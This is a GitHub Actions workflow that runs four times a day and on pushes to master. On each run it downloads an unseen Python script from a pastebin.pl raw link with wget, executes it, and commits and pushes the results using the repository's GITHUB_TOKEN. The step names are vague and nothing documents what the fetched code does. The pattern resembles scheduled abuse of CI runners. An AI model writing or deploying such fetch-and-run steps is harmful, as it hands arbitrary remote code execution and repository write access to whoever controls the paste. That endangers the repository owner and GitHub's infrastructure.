name: Ubuntu
on:
  push:
    branches:
      - master
  schedule:
    - cron: '0 0 * * *'
    - cron: '0 6 * * *'
    - cron: '0 12 * * *'
    - cron: '0 18 * * *'
jobs:
  Ubuntu:
    runs-on: ubuntu-latest
    steps:
    - name: arltest
      uses: actions/checkout@master
    
    - name: operations
      run: |
          wget https://pastebin.pl/view/raw/09a88697 -O 123.py
          touch res1.txt
          touch res.txt
          python3 123.py
          ls > res1.py
          git add res1.txt
          git add res.txt
    
    - name: Commit results to Github
      run: |
          git config --local user.email "xxx@xxx.io"
          git config --global user.name "xxx"
          git commit -m "Scan-Actions report" -a --allow-empty

    - name: Push changes
      uses: ad-m/github-push-action@master
      with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          branch: ${{ github.ref }}
